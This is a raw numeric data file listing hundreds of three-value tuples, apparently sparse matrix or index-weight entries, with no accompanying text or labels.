(241, 13219, 0.37338),
(237, 13220, 0.91),
(242, 13220, 0.91),
(252, 13220, 0.91),
(233, 15754, 0.88669),
(299, 15754, 1.77338),
(235, 15775, 0.18669),
(238, 15775, 0.18669),
(239, 15775, 0.18669),
(243, 15775, 0.18669),
(244, 15775, 0.18669),
(263, 15775, 0.18669),
(267, 15775, 0.18669),
(299, 15775, 0.18669),
(246, 15775, 0.37338),
(247, 15775, 0.56007),
(233, 15775, 1.12014),
(233, 15781, 0.23331),
(235, 15781, 0.23331),
(257, 15781, 0.23331),
(265, 15781, 0.23331),
(266, 15781, 0.23331),
(272, 15781, 0.23331),
(280, 15781, 0.23331),
(292, 15781, 0.23331),
(304, 15781, 0.23331),
(299, 15781, 0.46662),
(306, 15781, 0.46662),
(233, 15864, 0.86331),
(241, 15864, 0.86331),
(242, 15864, 0.86331),
(244, 15864, 0.86331),
(247, 15864, 0.86331),
(248, 15864, 0.86331),
(253, 15864, 0.86331),
(256, 15864, 0.86331),
(258, 15864, 0.86331),
(264, 15864, 0.86331),
(265, 15864, 0.86331),
(266, 15864, 0.86331),
(267, 15864, 0.86331),
(268, 15864, 0.86331),
(269, 15864, 0.86331),
(288, 15864, 0.86331),
(304, 15864, 0.86331),
(262, 15864, 1.72662),
(263, 15864, 1.72662),
(273, 15864, 1.72662),
(193, 15864, 2.58993),
(239, 15864, 2.58993),
(243, 15864, 2.58993),
(299, 15864, 2.58993),
(238, 15864, 3.45324),
(240, 15864, 3.45324),
(298, 15887, 0.0175),
(299, 15887, 0.0175),
(304, 15887, 0.0175),
(305, 15887, 0.0175),
(174, 15887, 0.14),
(178, 15887, 0.14),
(193, 15887, 0.14),
(235, 15887, 0.14),
(237, 15887, 0.14),
(239, 15887, 0.14),
(240, 15887, 0.14),
(241, 15887, 0.14),
(254, 15887, 0.14),
(258, 15887, 0.14),
(264, 15887, 0.14),
(267, 15887, 0.14),
(268, 15887, 0.14),
(273, 15887, 0.14),
(306, 15887, 0.14),
(308, 15887, 0.14),
(236, 15887, 0.28),
(238, 15887, 0.28),
(242, 15887, 0.42),
(290, 15887, 0.42),
(239, 15895, 0.86331),
(254, 15895, 0.86331),
(275, 15895, 0.86331),
(298, 15895, 0.86331),
(299, 15895, 0.86331),
(306, 15895, 0.86331),
(308, 15895, 0.86331),
(168, 15937, 0.18669),
(193, 15937, 0.18669),
(236, 15937, 0.18669),
(240, 15937, 0.18669),
(242, 15937, 0.18669),
(244, 15937, 0.18669),
(253, 15937, 0.18669),
(254, 15937, 0.18669),
(262, 15937, 0.18669),
(265, 15937, 0.18669),
(266, 15937, 0.18669),
(275, 15937, 0.18669),
(287, 15937, 0.18669),
(298, 15937, 0.18669),
(305, 15937, 0.18669),
(308, 15937, 0.18669),
(257, 15937, 0.37338),
(299, 15937, 0.37338),
(304, 15937, 0.37338),
(193, 15940, 0.91),
(240, 15940, 0.91),
(242, 15940, 0.91),
(254, 15940, 0.91),
(257, 15940, 0.91),
(287, 15940, 0.91),
(298, 15940, 0.91),
(299, 15940, 0.91),
(304, 15940, 0.91),
(308, 15940, 0.91),
(233, 16927, 0.28),
(306, 16927, 0.28),
(299, 16927, 0.56),
(244, 16927, 1.12),
(267, 16949, 0.42),
(290, 16949, 0.42),
(174, 16949, 0.84),
(193, 16949, 0.84),
(239, 16949, 0.84),
(243, 16949, 0.84),
(299, 16949, 0.84),
(305, 16949, 0.84),
(242, 16949, 1.26),
(240, 16949, 2.1),
(262, 16949, 2.52),
(298, 16949, 2.94),
(308, 16949, 2.94),
(233, 20850, 0.91),
(287, 20850, 0.91),
(308, 20850, 0.91),
(233, 20864, 0.42),
(239, 20864, 0.42),
(258, 20864, 0.42),
(267, 20864, 0.42),
(306, 20864, 0.42),
(168, 20870, 0.32669),
(174, 20870, 0.32669),
(233, 20870, 0.32669),
(246, 20870, 0.32669),
(253, 20870, 0.32669),
(298, 20870, 0.32669),
(308, 20870, 0.32669),
(178, 20870, 0.65338),
(267, 20870, 0.65338),
(237, 20870, 0.98007),
(240, 20870, 0.98007),
(233, 20871, 0.95669),
(246, 20871, 0.95669),
(298, 20871, 0.95669),
(308, 20871, 0.95669),
(240, 20871, 1.91338),
(233, 20873, 0.98),
(258, 20873, 0.98),
(233, 20875, 0.86331),
(272, 20875, 0.86331),
(280, 20875, 0.86331),
(233, 20877, 0.86331),
(254, 20877, 0.86331),
(258, 20877, 0.86331),
(178, 20882, 0.88669),
(233, 20882, 0.88669),
(236, 20882, 0.88669),
(254, 20882, 0.88669),
(262, 20882, 0.88669),
(267, 20882, 0.88669),
(306, 20882, 0.88669),
(174, 20884, 0.86331),
(193, 20884, 0.86331),
(233, 20884, 0.86331),
(237, 20884, 0.86331),
(238, 20884, 0.86331),
(239, 20884, 0.86331),
(241, 20884, 0.86331),
(242, 20884, 0.86331),
(246, 20884, 0.86331),
(247, 20884, 0.86331),
(256, 20884, 0.86331),
(259, 20884, 0.86331),
(260, 20884, 0.86331),
(261, 20884, 0.86331),
(265, 20884, 0.86331),
(266, 20884, 0.86331),
(273, 20884, 0.86331),
(292, 20884, 0.86331),
(240, 20884, 1.72662),
(268, 20884, 1.72662),
(269, 20884, 1.72662),
(270, 20884, 2.58993),
(301, 20884, 2.58993),
(306, 20884, 3.45324),
(233, 20885, 0.98),
(256, 20885, 0.98),
(265, 20885, 0.98),
(266, 20885, 0.98),
(273, 20885, 0.98),
(306, 20885, 0.98),
(193, 20886, 0.88669),
(233, 20886, 0.88669),
(239, 20886, 0.88669),
(240, 20886, 0.88669),
(244, 20886, 0.88669),
(246, 20886, 0.88669),
(248, 20886, 0.88669),
(265, 20886, 0.88669),
(266, 20886, 0.88669),
(305, 20886, 0.88669),
(262, 20886, 2.66007),
(174, 20893, 0.86331),
(233, 20893, 0.86331),
(233, 21205, 0.32669),
(237, 21205, 0.32669),
(241, 21205, 0.32669),
(253, 21205, 0.32669),
(254, 21205, 0.32669),
(255, 21205, 0.32669),
(257, 21205, 0.32669),
(258, 21205, 0.32669),
(259, 21205, 0.32669),
(260, 21205, 0.32669),
(261, 21205, 0.32669),
(262, 21205, 0.32669),
(263, 21205, 0.32669),
(264, 21205, 0.32669),
(268, 21205, 0.32669),
(269, 21205, 0.32669),
(270, 21205, 0.32669),
(272, 21205, 0.32669),
(273, 21205, 0.32669),
(274, 21205, 0.32669),
(275, 21205, 0.32669),
(280, 21205, 0.32669),
(288, 21205, 0.32669),
(292, 21205, 0.32669),
(301, 21205, 0.32669),
(304, 21205, 0.32669),
(305, 21205, 0.32669),
(298, 21208, 0.035),
(305, 21208, 0.035),
(178, 21208, 0.28),
(233, 21208, 0.28),
(235, 21208, 0.28),
(238, 21208, 0.28),
(240, 21208, 0.28),
(244, 21208, 0.28),
(247, 21208, 0.28),
(263, 21208, 0.28),
(264, 21208, 0.28),
(265, 21208, 0.28),
(266, 21208, 0.28),
(287, 21208, 0.28),
(308, 21208, 0.28),
(174, 21208, 0.56),
(239, 21208, 0.56),
(246, 21208, 0.56),
(261, 21208, 0.56),
(306, 21208, 0.56),
(193, 21208, 0.84),
(242, 21208, 1.4),
(233, 21209, 0.91),
(235, 21209, 0.91),
(242, 21209, 2.73),
(174, 21213, 0.23331),
(237, 21213, 0.23331),
(242, 21213, 0.23331),
(256, 21213, 0.23331),
(262, 21213, 0.23331),
(304, 21213, 0.23331),
(306, 21213, 0.23331),
(233, 21213, 0.46662),
(255, 21213, 0.46662),
(239, 21213, 0.69993),
(233, 21216, 0.88669),
(255, 21216, 0.88669),
(304, 21216, 0.88669),
(239, 21216, 2.66007),
(233, 21217, 1.07331),
(239, 21217, 3.21993),
(239, 21218, 0.37331),
(242, 21218, 0.37331),
(256, 21218, 0.37331),
(258, 21218, 0.37331),
(298, 21218, 0.37331),
(306, 21218, 0.37331),
(308, 21218, 0.37331),
(233, 21218, 1.11993),
(239, 21219, 0.95669),
(242, 21219, 0.95669),
(298, 21219, 0.95669),
(308, 21219, 0.95669),
(233, 21219, 1.91338),
(239, 21220, 1.14331),
(242, 21220, 1.14331),
(233, 21220, 2.28662),
(233, 21223, 1.02669),
(242, 21223, 1.02669),
(233, 21228, 0.23331),
(239, 21228, 0.23331),
(287, 21228, 0.23331),
(288, 21228, 0.23331),
(298, 21228, 0.23331),
(308, 21228, 0.23331),
(275, 21228, 0.46662),
(253, 22901, 0.93331),
(299, 22901, 0.93331),
(193, 22901, 1.86662),
(239, 22903, 0.81669),
(240, 22903, 0.81669),
(256, 22903, 0.81669),
(262, 22903, 0.81669),
(263, 22903, 0.81669),
(265, 22903, 0.81669),
(266, 22903, 0.81669),
(268, 22903, 0.81669),
(274, 22903, 0.81669),
(299, 22903, 0.81669),
(242, 22903, 1.63338),
(239, 22904, 0.88669),
(240, 22904, 0.88669),
(262, 22904, 0.88669),
(263, 22904, 0.88669),
(274, 22904, 0.88669),
(299, 22904, 0.88669),
(242, 22904, 1.77338),
(238, 22905, 0.86331),
(299, 22905, 0.86331),
(246, 22907, 0.81669),
(292, 22907, 0.81669),
(239, 22907, 1.63338),
(299, 22907, 1.63338),
(246, 22908, 1.02669),
(299, 22908, 1.02669),
(288, 22910, 0.93331),
(242, 22910, 1.86662),
(299, 22910, 1.86662),
(243, 22916, 0.95669),
(299, 22916, 0.95669),
(236, 22931, 0.14),
(249, 22931, 0.14),
(263, 22931, 0.14),
(299, 22931, 0.14),
(242, 22931, 0.28),
(239, 22934, 0.84),
(299, 22934, 0.84),
(239, 22935, 0.88669),
(299, 22935, 0.88669),
(178, 22954, 0.84),
(299, 22954, 0.84),
(306, 22954, 0.84),
(240, 22962, 0.91),
(245, 22962, 0.91),
(254, 22962, 0.91),
(265, 22962, 0.91),
(266, 22962, 0.91),
(299, 22962, 0.91),
(306, 22962, 0.91),
(246, 22964, 0.93331),
(295, 22964, 0.93331),
(299, 22964, 0.93331),
(304, 22964, 0.93331),
(178, 22964, 1.86662),
(244, 22964, 1.86662),
(299, 22968, 0.02338),
(254, 22968, 0.09331),
(261, 22968, 0.09331),
(273, 22968, 0.09331),
(290, 22968, 0.09331),
(306, 22968, 0.09331),
(258, 22968, 0.18662),
(292, 22968, 0.27993),
(178, 22968, 1.21303),
(238, 22969, 0.18669),
(247, 22969, 0.18669),
(263, 22969, 0.18669),
(264, 22969, 0.18669),
(273, 22969, 0.18669),
(299, 22969, 0.18669),
(240, 22974, 0.86331),
(244, 22974, 0.86331),
(174, 22974, 1.72662),
(299, 22974, 1.72662),
(244, 22979, 0.84),
(299, 22979, 0.84),
(304, 22979, 0.84),
(305, 22979, 0.84),
(178, 22979, 1.68),
(193, 22979, 1.68),
(244, 22980, 1.07331),
(299, 22980, 1.07331),
(239, 22997, 0.88669),
(272, 22997, 0.88669),
(280, 22997, 0.88669),
(299, 22997, 0.88669),
(236, 22999, 0.86331),
(240, 22999, 0.86331),
(243, 22999, 0.86331),
(267, 22999, 0.86331),
(299, 22999, 0.86331),
(275, 22999, 1.72662),
(262, 23003, 0.88669),
(270, 23003, 0.88669),
(274, 23003, 0.88669),
(299, 23003, 0.88669),
(301, 23003, 0.88669),
(240, 23007, 0.86331),
(288, 23007, 0.86331),
(299, 23007, 0.86331),
(236, 23011, 0.86331),
(299, 23011, 0.86331),
(246, 23017, 0.95669),
(299, 23017, 1.91338),
(247, 23023, 1.00331),
(299, 23023, 1.00331),
(178, 23026, 0.88669),
(240, 23026, 0.88669),
(255, 23026, 0.88669),
(299, 23026, 0.88669),
(306, 23026, 0.88669),
(258, 23026, 1.77338),
(274, 23036, 0.28),
(299, 23036, 0.84),
(275, 23045, 0.28),
(288, 23045, 0.28),
(299, 23045, 0.28),
(256, 23048, 0.81669),
(262, 23048, 0.81669),
(299, 23048, 0.81669),
(306, 23048, 0.81669),
(193, 23048, 1.63338),
(237, 23048, 1.63338),
(257, 23048, 1.63338),
(236, 23056, 0.88669),
(236, 23057, 0.95669),
(236, 23058, 0.88669),
(244, 23058, 0.88669),
(299, 23058, 0.88669),
(193, 23072, 0.84),
(242, 23072, 0.84),
(299, 23072, 0.84),
(178, 23072, 2.52),
(168, 23074, 0.84),
(244, 23074, 0.84),
(254, 23074, 0.84),
(258, 23074, 0.84),
(261, 23074, 0.84),
(267, 23074, 0.84),
(272, 23074, 0.84),
(280, 23074, 0.84),
(299, 23074, 0.84),
(304, 23074, 0.84),
(256, 23074, 1.68),
(263, 23074, 1.68),
(305, 23074, 1.68),
(237, 23074, 3.36),
(193, 23076, 0.28),
(299, 23076, 0.28),
(243, 23084, 0.46669),
(299, 23084, 0.93338),
(247, 23089, 0.95669),
(299, 23089, 0.95669),
(257, 23093, 1.00331),
(299, 23093, 1.00331),
(238, 23950, 0.18669),
(239, 23950, 0.18669),
(240, 23950, 0.18669),
(242, 23950, 0.18669),
(244, 23950, 0.18669),
(253, 23950, 0.18669),
(257, 23950, 0.18669),
(258, 23950, 0.18669),
(262, 23950, 0.18669),
(263, 23950, 0.18669),
(304, 23950, 0.18669),
(256, 23950, 0.37338),
(299, 23950, 0.37338),
(305, 23950, 0.37338),
(243, 23950, 0.56007),
(265, 23950, 0.56007),
(266, 23950, 0.56007),
(292, 23950, 0.56007),
(306, 23950, 0.56007),
(178, 23950, 0.93345),
(255, 23950, 1.12014),
(243, 23953, 0.86331),
(263, 23953, 0.86331),
(299, 23953, 0.86331),
(265, 23953, 1.72662),
(266, 23953, 1.72662),
(263, 23954, 0.95669),
(299, 23954, 0.95669),
(244, 23960, 0.37338),
(299, 23960, 0.56007),
(269, 23967, 0.46662),
(246, 23967, 0.69993),
(299, 23967, 3.9996),
(246, 23984, 0.32669),
(274, 23984, 0.98007),
(299, 23984, 1.96014),
(274, 23993, 0.93331),
(299, 23993, 0.93331),
(299, 24001, 0.91),
(262, 24001, 1.82),
(244, 24003, 0.18669),
(299, 24003, 0.18669),
(242, 24006, 0.32669),
(243, 24006, 0.32669),
(272, 24006, 0.32669),
(280, 24006, 0.32669),
(299, 24006, 0.32669),
(240, 24009, 0.23331),
(243, 24009, 0.23331),
(246, 24009, 0.23331),
(247, 24009, 0.23331),
(248, 24009, 0.23331),
(256, 24009, 0.23331),
(257, 24009, 0.23331),
(262, 24009, 0.23331),
(263, 24009, 0.23331),
(267, 24009, 0.23331),
(288, 24009, 0.23331),
(299, 24009, 0.23331),
(235, 24009, 0.46662),
(258, 24009, 0.46662),
(292, 24009, 0.46662),
(305, 24009, 0.46662),
(241, 24009, 0.69993),
(236, 24009, 0.93324),
(239, 24009, 0.93324),
(244, 24009, 1.86648),
(275, 24009, 2.36643),
(178, 24009, 3.96627),
(299, 24010, 0.93331),
(244, 24010, 1.86662),
(244, 24011, 1.05),
(299, 24011, 1.05),
(299, 24012, 0.69993),
(178, 24012, 1.16655),
(299, 24019, 0.0175),
(242, 24019, 0.14),
(263, 24019, 0.14),
(273, 24019, 0.14),
(268, 24019, 0.28),
(274, 24019, 0.28),
(306, 24019, 0.42),
(178, 24019, 1.26),
(299, 24028, 0.23331),
(178, 24028, 0.46662),
(239, 24031, 0.23331),
(243, 24031, 0.23331),
(254, 24031, 0.23331),
(263, 24031, 0.23331),
(288, 24031, 0.23331),
(299, 24031, 0.23331),
(261, 24031, 0.69993),
(235, 24034, 0.14),
(236, 24034, 0.14),
(246, 24034, 0.14),
(257, 24034, 0.14),
(299, 24034, 0.42),
(236, 24035, 0.86331),
(299, 24035, 0.86331),
(238, 24062, 0.32669),
(299, 24062, 0.32669),
(244, 24065, 0.18669),
(259, 24065, 0.18669),
(260, 24065, 0.18669),
(263, 24065, 0.18669),
(242, 24065, 0.37338),
(299, 24065, 0.56007),
(244, 24068, 0.88669),
(299, 24068, 0.88669),
(244, 24069, 0.95669),
(299, 24069, 0.95669),
(193, 24076, 0.14),
(235, 24076, 0.14),
(238, 24076, 0.14),
(242, 24076, 0.14),
(244, 24076, 0.14),
(265, 24076, 0.14),
(266, 24076, 0.14),
(290, 24076, 0.14),
(299, 24076, 0.14),
(178, 24076, 0.56),
(253, 24076, 0.56),
(253, 24077, 0.84),
(299, 24077, 0.84),
(240, 24083, 0.23331),
(253, 24083, 0.23331),
(261, 24083, 0.23331),
(274, 24083, 0.23331),
(299, 24083, 0.23331),
(235, 24083, 0.46662),
(292, 24083, 0.46662),
(295, 24083, 0.69993),
(261, 24086, 0.32669),
(299, 24086, 0.32669),
(168, 24089, 0.18669),
(235, 24089, 0.18669),
(238, 24089, 0.18669),
(273, 24089, 0.18669),
(306, 24089, 0.18669),
(237, 24089, 0.37338),
(239, 24089, 0.37338),
(299, 24089, 0.37338),
(193, 24089, 0.74676),
(249, 24891, 0.88669),
(298, 24891, 0.88669),
(308, 24891, 0.88669),
(268, 24891, 2.66007),
(253, 24893, 0.84),
(298, 24893, 0.84),
(308, 24893, 0.84),
(240, 24895, 0.46669),
(264, 24895, 0.46669),
(267, 24895, 0.46669),
(269, 24895, 0.46669),
(298, 24895, 0.46669),
(308, 24895, 0.46669),
(305, 24895, 0.93338),
(238, 24895, 2.33345),
(237, 24898, 0.28),
(298, 24898, 0.28),
(308, 24898, 0.28),
(270, 24910, 0.95669),
(301, 24910, 0.95669),
(308, 24910, 0.95669),
(242, 24914, 0.93331),
(298, 24914, 0.93331),
(308, 24914, 0.93331),
(263, 24921, 0.37331),
(305, 24921, 0.37331),
(306, 24921, 0.37331),
(308, 24921, 0.37331),
(268, 24921, 0.74662),
(174, 24924, 0.42),
(238, 24924, 0.42),
(256, 24924, 0.42),
(298, 24924, 0.42),
(305, 24924, 0.42),
(308, 24924, 0.42),
(288, 24924, 0.84),
(306, 24924, 1.26),
(193, 24924, 1.68),
(238, 24927, 1.07331),
(269, 24927, 1.07331),
(298, 24927, 1.07331),
(308, 24927, 1.07331),
(241, 24927, 2.14662),
(174, 24931, 0.37331),
(241, 24931, 0.37331),
(242, 24931, 0.37331),
(247, 24931, 0.37331),
(249, 24931, 0.37331),
(255, 24931, 0.37331),
(259, 24931, 0.37331),
(260, 24931, 0.37331),
(268, 24931, 0.37331),
(274, 24931, 0.37331),
(290, 24931, 0.37331),
(298, 24931, 0.37331),
(305, 24931, 0.37331),
(308, 24931, 0.37331),
(257, 24931, 0.74662),
(267, 24931, 0.74662),
(241, 24932, 1.00331),
(247, 24932, 1.00331),
(249, 24932, 1.00331),
(267, 24932, 1.00331),
(298, 24932, 1.00331),
(308, 24932, 1.00331),
(257, 24932, 2.00662),
(178, 24938, 0.86331),
(235, 24938, 0.86331),
(237, 24938, 0.86331),
(239, 24938, 0.86331),
(242, 24938, 0.86331),
(246, 24938, 0.86331),
(254, 24938, 0.86331),
(258, 24938, 0.86331),
(263, 24938, 0.86331),
(264, 24938, 0.86331),
(270, 24938, 0.86331),
(275, 24938, 0.86331),
(298, 24938, 0.86331),
(301, 24938, 0.86331),
(308, 24938, 0.86331),
(174, 24938, 1.72662),
(261, 24938, 1.72662),
(237, 24944, 0.93331),
(254, 24944, 0.93331),
(268, 24944, 0.93331),
(292, 24944, 0.93331),
(298, 24944, 0.93331),
(308, 24944, 0.93331),
(240, 24944, 1.86662),
(237, 24946, 0.46669),
(298, 24946, 0.46669),
(304, 24946, 0.46669),
(306, 24946, 0.46669),
(308, 24946, 0.93338),
(242, 24951, 0.28),
(287, 24951, 0.28),
(298, 24951, 0.28),
(308, 24951, 0.28),
(178, 24951, 0.56),
(240, 25303, 0.51331),
(298, 25303, 5.71974),
(308, 25303, 5.71974),
(304, 25303, 9.75289),
(239, 25310, 0.23331),
(244, 25310, 0.23331),
(261, 25310, 0.23331),
(298, 25310, 0.23331),
(304, 25310, 0.23331),
(308, 25310, 0.23331),
(261, 25311, 0.93331),
(298, 25311, 0.93331),
(308, 25311, 0.93331),
(261, 25312, 1.02669),
(298, 25312, 1.02669),
(308, 25312, 1.02669),
(178, 25315, 0.37331),
(255, 25315, 0.37331),
(298, 25315, 0.37331),
(308, 25315, 0.37331),
(262, 25315, 0.74662),
(239, 25332, 0.23331),
(254, 25332, 0.23331),
(298, 25332, 0.23331),
(308, 25332, 0.23331),
(240, 25332, 0.46662),
(262, 25332, 0.46662),
(288, 25332, 0.46662),
(239, 25333, 0.93331),
(298, 25333, 0.93331),
(308, 25333, 0.93331),
(239, 25334, 1.05),
(298, 25334, 1.05),
(308, 25334, 1.05),
(267, 25337, 1.02669),
(298, 25337, 1.02669),
(308, 25337, 1.02669),
(168, 25341, 0.91),
(239, 25341, 0.91),
(248, 25341, 0.91),
(262, 25341, 0.91),
(268, 25341, 0.91),
(298, 25341, 0.91),
(304, 25341, 0.91),
(305, 25341, 0.91),
(308, 25341, 0.91),
(236, 25343, 0.32669),
(247, 25343, 0.32669),
(254, 25343, 0.32669),
(298, 25343, 0.32669),
(304, 25343, 0.32669),
(308, 25343, 0.32669),
(262, 25343, 0.65338),
(257, 25358, 0.18669),
(264, 25358, 0.18669),
(270, 25358, 0.18669),
(298, 25358, 0.18669),
(301, 25358, 0.18669),
(304, 25358, 0.18669),
(308, 25358, 0.18669),
(265, 25358, 0.37338),
(266, 25358, 0.37338),
(237, 25358, 0.56007),
(253, 25358, 1.30683),
(257, 25359, 0.91),
(298, 25359, 0.91),
(304, 25359, 0.91),
(308, 25359, 0.91),
(257, 25360, 1.02669),
(298, 25360, 1.02669),
(304, 25360, 1.02669),
(308, 25360, 1.02669),
(174, 25364, 0.18669),
(238, 25364, 0.18669),
(240, 25364, 0.18669),
(242, 25364, 0.18669),
(244, 25364, 0.18669),
(246, 25364, 0.18669),
(256, 25364, 0.18669),
(262, 25364, 0.18669),
(268, 25364, 0.18669),
(295, 25364, 0.18669),
(298, 25364, 0.18669),
(308, 25364, 0.18669),
(239, 25364, 0.37338),
(261, 25364, 0.37338),
(305, 25364, 0.37338),
(168, 25364, 2.24028),
(236, 25367, 0.32669),
(238, 25367, 0.32669),
(259, 25367, 0.32669),
(260, 25367, 0.32669),
(290, 25367, 0.32669),
(298, 25367, 0.32669),
(308, 25367, 0.32669),
(193, 25373, 0.37331),
(240, 25373, 0.37331),
(267, 25373, 0.37331),
(272, 25373, 0.37331),
(280, 25373, 0.37331),
(298, 25373, 0.37331),
(308, 25373, 0.37331),
(262, 25373, 2.23986),
(262, 25374, 1.00331),
(267, 25374, 1.00331),
(298, 25374, 1.00331),
(308, 25374, 1.00331),
(262, 25375, 1.12),
(298, 25375, 1.12),
(308, 25375, 1.12),
(275, 25379, 0.91),
(298, 25379, 0.91),
(308, 25379, 0.91),
(275, 25380, 1.05),
(298, 25380, 1.05),
(308, 25380, 1.05),
(44, 25915, 1.86662),
(238, 25936, 0.32669),
(243, 25936, 0.32669),
(287, 25936, 0.32669),
(306, 25936, 0.65338),
(44, 25936, 1.44677),
(290, 25936, 2.28683),
(44, 25937, 1.96),
(44, 25938, 2.05338),
(168, 25939, 0.84),
(44, 25939, 1.68),
(44, 25940, 1.82),
(45, 25976, 0.68),
(295, 25976, 2.56),
(45, 25977, 2.43661),
(45, 25978, 2.60661),
(45, 25979, 0.37338),
(45, 25980, 1.82),
(174, 25985, 0.28),
(241, 25985, 0.28),
(269, 25985, 0.28),
(45, 25985, 0.68),
(49, 25985, 0.68),
(45, 25986, 2.21),
(49, 25986, 2.21),
(45, 25987, 2.72),
(46, 25990, 2.32339),
(46, 25991, 2.66339),
(47, 26012, 1.44677),
(295, 26012, 3.64026),
(48, 26020, 2.27323),
(48, 26021, 5.06323),
(48, 26022, 5.89),
(275, 26029, 0.32669),
(292, 26029, 0.32669),
(295, 26029, 0.32669),
(238, 26029, 0.65338),
(242, 26029, 0.65338),
(48, 26029, 1.44677),
(48, 26030, 5.06323),
(48, 26031, 5.89),
(49, 26056, 2.43661),
(168, 28815, 0.14),
(253, 28815, 0.14),
(268, 28815, 0.14),
(193, 28815, 0.56),
(235, 31280, 0.81669),
(242, 31280, 0.81669),
(193, 31280, 1.63338),
(193, 31335, 0.91),
(236, 31335, 0.91),
(193, 31336, 0.98),
(236, 31336, 0.98),
(193, 31378, 0.91),
(235, 31378, 0.91),
(254, 31378, 0.91),
(256, 31378, 0.91),
(263, 31378, 0.91),
(269, 31378, 0.91),
(288, 31378, 0.91),
(243, 31378, 1.82),
(193, 31379, 0.98),
(235, 31379, 0.98),
(243, 31379, 0.98),
(269, 31379, 0.98),
(193, 31406, 0.91),
(243, 31406, 0.91),
(254, 31406, 0.91),
(237, 31418, 0.84),
(239, 31418, 0.84),
(240, 31418, 0.84),
(242, 31418, 0.84),
(243, 31418, 0.84),
(246, 31418, 0.84),
(255, 31418, 0.84),
(263, 31418, 0.84),
(268, 31418, 0.84),
(275, 31418, 0.84),
(290, 31418, 0.84),
(305, 31418, 0.84),
(306, 31418, 0.84),
(236, 31418, 1.68),
(249, 31418, 1.68),
(270, 31418, 1.68),
(301, 31418, 1.68),
(241, 31418, 2.52),
(273, 31418, 2.52),
(193, 31418, 3.36),
(193, 32565, 0.14),
(239, 32565, 0.14),
(241, 32565, 0.14),
(244, 32565, 0.14),
(254, 32565, 0.14),
(255, 32565, 0.14),
(268, 32565, 0.14),
(292, 32565, 0.14),
(242, 32565, 0.56),
(193, 32619, 0.88669),
(235, 32619, 0.88669),
(259, 32619, 0.88669),
(260, 32619, 0.88669),
(193, 32659, 0.37331),
(235, 32659, 0.37331),
(236, 32659, 0.37331),
(239, 32662, 0.86331),
(243, 32662, 0.86331),
(254, 32662, 0.86331),
(255, 32662, 0.86331),
(193, 32662, 2.95992),
(174, 32689, 0.18669),
(193, 32689, 0.18669),
(236, 32689, 0.18669),
(240, 32689, 0.18669),
(242, 32689, 0.18669),
(245, 32689, 0.18669),
(261, 32689, 0.18669),
(262, 32689, 0.18669),
(263, 32689, 0.18669),
(267, 32689, 0.18669),
(274, 32689, 0.18669),
(292, 32689, 0.18669),
(178, 32689, 0.37338),
(235, 32689, 0.37338),
(239, 32689, 0.37338),
(241, 32689, 0.37338),
(272, 32689, 0.37338),
(280, 32689, 0.37338),
(306, 32689, 0.37338),
(243, 32689, 0.56007),
(235, 36324, 0.95669),
(253, 36324, 0.95669),
(174, 36329, 0.86331),
(243, 36329, 0.86331),
(253, 36329, 0.86331),
(288, 36329, 0.86331),
(304, 36329, 0.86331),
(237, 36335, 0.81669),
(243, 36335, 0.81669),
(245, 36335, 0.81669),
(247, 36335, 0.81669),
(253, 36335, 0.81669),
(267, 36335, 0.81669),
(270, 36335, 0.81669),
(274, 36335, 0.81669),
(301, 36335, 0.81669),
(178, 36335, 1.63338),
(240, 36335, 1.63338),
(248, 36335, 1.63338),
(261, 36335, 1.63338),
(272, 36335, 1.63338),
(280, 36335, 1.63338),
(305, 36335, 1.63338),
(258, 36335, 2.45007),
(262, 36335, 2.45007),
(263, 36335, 2.45007),
(304, 36335, 2.45007),
(254, 36335, 3.26676),
(240, 36336, 0.91),
(253, 36336, 0.91),
(239, 36339, 0.86331),
(243, 36339, 0.86331),
(253, 36339, 0.86331),
(257, 36339, 0.86331),
(272, 36339, 0.86331),
(280, 36339, 0.86331),
(292, 36339, 0.86331),
(304, 36339, 0.86331),
(235, 36343, 0.86331),
(253, 36343, 0.86331),
(235, 36346, 0.23331),
(236, 36346, 0.23331),
(240, 36346, 0.23331),
(246, 36346, 0.23331),
(248, 36346, 0.23331),
(249, 36346, 0.23331),
(253, 36346, 0.23331),
(264, 36346, 0.23331),
(269, 36346, 0.23331),
(304, 36346, 0.23331),
(305, 36346, 0.23331),
(242, 36346, 0.69993),
(238, 36349, 0.32669),
(253, 36349, 0.32669),
(168, 36352, 0.18669),
(178, 36352, 0.18669),
(243, 36352, 0.18669),
(253, 36352, 0.18669),
(275, 36352, 0.18669),
(243, 36353, 0.88669),
(253, 36353, 0.88669),
(275, 36353, 0.88669),
(243, 36354, 0.98),
(253, 36354, 0.98),
(275, 36354, 0.98),
(237, 36358, 1.02669),
(253, 36358, 1.02669),
(243, 36371, 0.86331),
(253, 36371, 0.86331),
(275, 36371, 0.86331),
(178, 36375, 0.84),
(242, 36375, 0.84),
(243, 36375, 0.84),
(244, 36375, 0.84),
(248, 36375, 0.84),
(253, 36375, 0.84),
(254, 36375, 0.84),
(258, 36375, 0.84),
(265, 36375, 0.84),
(266, 36375, 0.84),
(267, 36375, 0.84),
(274, 36375, 0.84),
(290, 36375, 0.84),
(292, 36375, 0.84),
(304, 36375, 0.84),
(306, 36375, 0.84),
(174, 36375, 1.68),
(236, 36380, 0.93331),
(253, 36380, 0.93331),
(272, 36380, 0.93331),
(280, 36380, 0.93331),
(253, 36381, 1.07331),
(272, 36381, 1.07331),
(280, 36381, 1.07331),
(253, 36382, 0.86331),
(273, 36382, 0.86331),
(274, 36382, 0.86331),
(237, 36387, 0.88669),
(253, 36387, 0.88669),
(178, 36390, 0.84),
(242, 36390, 0.84),
(253, 36390, 0.84),
(265, 36390, 0.84),
(266, 36390, 0.84),
(306, 36390, 0.84),
(290, 36390, 1.68),
(237, 36394, 0.86331),
(241, 36394, 0.86331),
(253, 36394, 0.86331),
(254, 36394, 0.86331),
(255, 36394, 0.86331),
(256, 36394, 0.86331),
(258, 36394, 0.86331),
(259, 36394, 0.86331),
(260, 36394, 0.86331),
(261, 36394, 0.86331),
(262, 36394, 0.86331),
(263, 36394, 0.86331),
(264, 36394, 0.86331),
(265, 36394, 0.86331),
(266, 36394, 0.86331),
(267, 36394, 0.86331),
(268, 36394, 0.86331),
(270, 36394, 0.86331),
(272, 36394, 0.86331),
(273, 36394, 0.86331),
(274, 36394, 0.86331),
(275, 36394, 0.86331),
(280, 36394, 0.86331),
(288, 36394, 0.86331),
(292, 36394, 0.86331),
(301, 36394, 0.86331),
(304, 36394, 0.86331),
(305, 36394, 0.86331),
(241, 36395, 0.98),
(253, 36395, 0.98),
(254, 36395, 0.98),
(255, 36395, 0.98),
(256, 36395, 0.98),
(258, 36395, 0.98),
(259, 36395, 0.98),
